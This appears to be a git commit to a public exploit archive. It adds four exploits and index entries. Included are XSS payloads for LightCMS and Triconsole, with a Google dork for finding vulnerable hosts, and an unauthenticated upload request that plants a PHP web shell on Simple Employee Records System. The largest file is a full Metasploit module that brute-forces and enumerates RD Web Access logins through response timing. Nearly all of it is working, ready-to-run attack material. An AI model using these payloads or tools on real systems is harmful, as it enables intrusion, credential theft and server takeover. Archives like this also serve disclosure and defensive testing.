DB: 2021-02-27
4 changes to exploits/shellcodes Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module) Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated) Triconsole 3.75 - Reflected XSS LightCMS 1.3.4 - 'exclusive' Stored XSS
This commit is contained in:
parent
0ec0dacc0e
commit
b9c4ec0226
5 changed files with 284 additions and 0 deletions
18
exploits/multiple/webapps/49598.txt
Normal file
18
exploits/multiple/webapps/49598.txt
Normal file
|
@ -0,0 +1,18 @@
|
|||
# Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS
|
||||
# Date: 25/02/2021
|
||||
# Exploit Author: Peithon
|
||||
# Vendor Homepage: https://github.com/eddy8/LightCMS
|
||||
# Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4
|
||||
# Version: 1.3.4
|
||||
# Tested on: latest version of Chrome, Firefox on Windows and Linux
|
||||
# CVE: CVE-2021-3355
|
||||
|
||||
An issue was discovered in LightCMS v1.3.4.(https://github.com/eddy8/LightCMS/issues/18) There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords.
|
||||
|
||||
--------------------------Proof of Concept-----------------------
|
||||
|
||||
1. Log in to the background.
|
||||
|
||||
2. Navigate to System -> `/admin/SensitiveWords/create` & add the below-shared payload as the exclusive field value. Payload - </span><img src=1 onerror=alert(1) /><span>
|
||||
|
||||
3. Visit page `/admin/SensitiveWords`, the payload will be triggered.
|
56
exploits/php/webapps/49596.txt
Normal file
56
exploits/php/webapps/49596.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)
|
||||
# Date: 2021-02-25
|
||||
# Exploit Author: sml@lacashita.com
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip
|
||||
# Version: v1.0
|
||||
# Tested on: Ubuntu 20.04.2
|
||||
|
||||
uploadID.php can be used to upload .php files to
|
||||
'/uploads/employees_ids/' without authentication.
|
||||
|
||||
POC
|
||||
---
|
||||
|
||||
1) Make the following Request changing the "Host:" to your Victim IP.
|
||||
|
||||
POST /dashboard/uploadID.php HTTP/1.1
|
||||
Host: 192.168.1.117
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
|
||||
Firefox/78.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------5825462663702204104870787337
|
||||
Content-Length: 267
|
||||
DNT: 1
|
||||
Connection: close
|
||||
|
||||
-----------------------------5825462663702204104870787337
|
||||
Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php"
|
||||
Content-Type: image/png
|
||||
<?php
|
||||
$cmd=$_GET['cmd'];
|
||||
system($cmd);
|
||||
?>
|
||||
-----------------------------5825462663702204104870787337--
|
||||
|
||||
|
||||
2) You will get the response with the name of the uploaded file
|
||||
(upload_filename).
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Server: nginx/1.18.0 (Ubuntu)
|
||||
Date: Thu, 25 Feb 2021 19:17:55 GMT
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Connection: close
|
||||
Content-Length: 77
|
||||
{"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"}
|
||||
|
||||
3) Your file will be located in:
|
||||
http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php
|
||||
|
||||
4) In this example, to run commands:
|
||||
http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami
|
11
exploits/php/webapps/49597.txt
Normal file
11
exploits/php/webapps/49597.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# Exploit Title: Triconsole 3.75 - Reflected XSS
|
||||
# Google Dork: inurl : /calendar/calendar_form.php
|
||||
# Date: 15/2/2021
|
||||
# Exploit Author: Akash Chathoth
|
||||
# Vendor Homepage: http://www.triconsole.com/
|
||||
# Software Link: http://www.triconsole.com/php/calendar_datepicker.php
|
||||
# Version: < 3.76 (14 February 2021)
|
||||
# Tested on: 3.75
|
||||
# CVE: 2021-27330
|
||||
|
||||
# Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>
|
195
exploits/windows/remote/49599.py
Executable file
195
exploits/windows/remote/49599.py
Executable file
|
@ -0,0 +1,195 @@
|
|||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
# standard modules
|
||||
from metasploit import module
|
||||
|
||||
# extra modules
|
||||
DEPENDENCIES_MISSING = False
|
||||
try:
|
||||
import base64
|
||||
import itertools
|
||||
import os
|
||||
import requests
|
||||
except ImportError:
|
||||
DEPENDENCIES_MISSING = True
|
||||
|
||||
|
||||
# Metasploit Metadata
|
||||
metadata = {
|
||||
'name': 'Microsoft RDP Web Client Login Enumeration',
|
||||
'description': '''
|
||||
Enumerate valid usernames and passwords against a Microsoft RDP Web Client
|
||||
by attempting authentication and performing a timing based check
|
||||
against the provided username.
|
||||
''',
|
||||
'authors': [
|
||||
'Matthew Dunn'
|
||||
],
|
||||
'date': '2020-12-23',
|
||||
'license': 'MSF_LICENSE',
|
||||
'references': [
|
||||
{'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'},
|
||||
],
|
||||
'type': 'single_scanner',
|
||||
'options': {
|
||||
'targeturi': {'type': 'string',
|
||||
'description': 'The base path to the RDP Web Client install',
|
||||
'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'},
|
||||
'rport': {'type': 'port', 'description': 'Port to target',
|
||||
'required': True, 'default': 443},
|
||||
'domain': {'type': 'string', 'description': 'The target AD domain',
|
||||
'required': False, 'default': None},
|
||||
'username': {'type': 'string',
|
||||
'description': 'The username to verify or path to a file of usernames',
|
||||
'required': True, 'default': None},
|
||||
'password': {'type': 'string',
|
||||
'description': 'The password to try or path to a file of passwords',
|
||||
'required': False, 'default': None},
|
||||
'timeout': {'type': 'int',
|
||||
'description': 'Response timeout in milliseconds to consider username invalid',
|
||||
'required': True, 'default': 1250},
|
||||
'enum_domain': {'type': 'bool',
|
||||
'description': 'Automatically enumerate AD domain using NTLM',
|
||||
'required': False, 'default': True},
|
||||
'verify_service': {'type': 'bool',
|
||||
'description': 'Verify the service is up before performing login scan',
|
||||
'required': False, 'default': True},
|
||||
'user_agent': {'type': 'string',
|
||||
'description': 'User Agent string to use, defaults to Firefox',
|
||||
'required': False,
|
||||
'default': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
def verify_service(rhost, rport, targeturi, timeout, user_agent):
|
||||
"""Verify the service is up at the target URI within the specified timeout"""
|
||||
url = f'https://{rhost}:{rport}/{targeturi}'
|
||||
headers = {'Host':rhost,
|
||||
'User-Agent': user_agent}
|
||||
try:
|
||||
request = requests.get(url, headers=headers, timeout=(timeout / 1000),
|
||||
verify=False, allow_redirects=False)
|
||||
return request.status_code == 200 and 'RDWeb' in request.text
|
||||
except requests.exceptions.Timeout:
|
||||
return False
|
||||
except Exception as exc:
|
||||
module.log(str(exc), level='error')
|
||||
return False
|
||||
|
||||
|
||||
def get_ad_domain(rhost, rport, user_agent):
|
||||
"""Retrieve the NTLM domain out of a specific challenge/response"""
|
||||
domain_urls = ['aspnet_client', 'Autodiscover', 'ecp', 'EWS', 'OAB',
|
||||
'Microsoft-Server-ActiveSync', 'PowerShell', 'rpc']
|
||||
headers = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==',
|
||||
'User-Agent': user_agent,
|
||||
'Host': rhost}
|
||||
session = requests.Session()
|
||||
for url in domain_urls:
|
||||
target_url = f"https://{rhost}:{rport}/{url}"
|
||||
request = session.get(target_url, headers=headers, verify=False)
|
||||
# Decode the provided NTLM Response to strip out the domain name
|
||||
if request.status_code == 401 and 'WWW-Authenticate' in request.headers and \
|
||||
'NTLM' in request.headers['WWW-Authenticate']:
|
||||
domain_hash = request.headers['WWW-Authenticate'].split('NTLM ')[1].split(',')[0]
|
||||
domain = base64.b64decode(bytes(domain_hash,
|
||||
'utf-8')).replace(b'\x00',b'').split(b'\n')[1]
|
||||
domain = domain[domain.index(b'\x0f') + 1:domain.index(b'\x02')].decode('utf-8')
|
||||
module.log(f'Found Domain: {domain}', level='good')
|
||||
return domain
|
||||
module.log('Failed to find Domain', level='error')
|
||||
return None
|
||||
|
||||
|
||||
def check_login(rhost, rport, targeturi, domain, username, password, timeout, user_agent):
|
||||
"""Check a single login against the RDWeb Client
|
||||
The timeout is used to specify the amount of milliseconds where a
|
||||
response should consider the username invalid."""
|
||||
|
||||
url = f'https://{rhost}:{rport}/{targeturi}'
|
||||
body = f'DomainUserName={domain}%5C{username}&UserPass={password}'
|
||||
headers = {'Host':rhost,
|
||||
'User-Agent': user_agent,
|
||||
'Content-Type': 'application/x-www-form-urlencoded',
|
||||
'Content-Length': f'{len(body)}',
|
||||
'Origin': f'https://{rhost}'}
|
||||
session = requests.Session()
|
||||
report_data = {'domain':domain, 'address': rhost, 'port': rport,
|
||||
'protocol': 'tcp', 'service_name':'RDWeb'}
|
||||
try:
|
||||
request = session.post(url, data=body, headers=headers,
|
||||
timeout=(timeout / 1000), verify=False, allow_redirects=False)
|
||||
if request.status_code == 302:
|
||||
module.log(f'Login {domain}\\{username}:{password} is valid!', level='good')
|
||||
module.report_correct_password(username, password, **report_data)
|
||||
elif request.status_code == 200:
|
||||
module.log(f'Password {password} is invalid but {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds',
|
||||
level='good')
|
||||
module.report_valid_username(username, **report_data)
|
||||
else:
|
||||
module.log(f'Received unknown response with status code: {request.status_code}')
|
||||
except requests.exceptions.Timeout:
|
||||
module.log(f'Login {domain}\\{username}:{password} is invalid! No response received in {timeout} milliseconds',
|
||||
level='error')
|
||||
except requests.exceptions.RequestException as exc:
|
||||
module.log('{}'.format(exc), level='error')
|
||||
return
|
||||
|
||||
|
||||
def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout, user_agent):
|
||||
"""Check each username and password combination"""
|
||||
for (username, password) in list(itertools.product(usernames, passwords)):
|
||||
check_login(rhost, rport, targeturi, domain,
|
||||
username.strip(), password.strip(), timeout, user_agent)
|
||||
|
||||
def run(args):
|
||||
"""Run the module, gathering the domain if desired and verifying usernames and passwords"""
|
||||
module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOSTS']))
|
||||
if DEPENDENCIES_MISSING:
|
||||
module.log('Module dependencies are missing, cannot continue', level='error')
|
||||
return
|
||||
|
||||
user_agent = args['user_agent']
|
||||
# Verify the service is up if requested
|
||||
if args['verify_service']:
|
||||
service_verified = verify_service(args['RHOSTS'], args['rport'],
|
||||
args['targeturi'], int(args['timeout']), user_agent)
|
||||
if service_verified:
|
||||
module.log('Service is up, beginning scan...', level='good')
|
||||
else:
|
||||
module.log(f'Service appears to be down, no response in {args["timeout"]} milliseconds',
|
||||
level='error')
|
||||
return
|
||||
|
||||
# Gather AD Domain either from args or enumeration
|
||||
domain = args['domain'] if 'domain' in args else None
|
||||
if not domain and args['enum_domain']:
|
||||
domain = get_ad_domain(args['RHOSTS'], args['rport'], user_agent)
|
||||
|
||||
# Verify we have a proper domain
|
||||
if not domain:
|
||||
module.log('Either domain or enum_domain must be set to continue, aborting...',
|
||||
level='error')
|
||||
return
|
||||
|
||||
# Gather usernames and passwords for enumeration
|
||||
if os.path.isfile(args['username']):
|
||||
with open(args['username'], 'r') as file_contents:
|
||||
usernames = file_contents.readlines()
|
||||
else:
|
||||
usernames = [args['username']]
|
||||
if 'password' in args and os.path.isfile(args['password']):
|
||||
with open(args['password'], 'r') as file_contents:
|
||||
passwords = file_contents.readlines()
|
||||
elif 'password' in args and args['password']:
|
||||
passwords = [args['password']]
|
||||
else:
|
||||
passwords = ['wrong']
|
||||
# Check each valid login combination
|
||||
check_logins(args['RHOSTS'], args['rport'], args['targeturi'],
|
||||
domain, usernames, passwords, int(args['timeout']), user_agent)
|
||||
|
||||
if __name__ == '__main__':
|
||||
module.run(metadata, run)
|
|
@ -18389,6 +18389,7 @@ id,file,description,date,author,type,platform,port
|
|||
49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
|
||||
49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple,
|
||||
49594,exploits/windows/remote/49594.py,"ASUS Remote Link 1.1.2.13 - Remote Code Execution",2021-02-25,H4rk3nz0,remote,windows,
|
||||
49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -43784,3 +43785,6 @@ id,file,description,date,author,type,platform,port
|
|||
49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,
|
||||
49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php,
|
||||
49595,exploits/php/webapps/49595.txt,"Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)",2021-02-25,"Tushar Vaidya",webapps,php,
|
||||
49596,exploits/php/webapps/49596.txt,"Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)",2021-02-26,sml,webapps,php,
|
||||
49597,exploits/php/webapps/49597.txt,"Triconsole 3.75 - Reflected XSS",2021-02-26,"Akash Chathoth",webapps,php,
|
||||
49598,exploits/multiple/webapps/49598.txt,"LightCMS 1.3.4 - 'exclusive' Stored XSS",2021-02-26,Peithon,webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue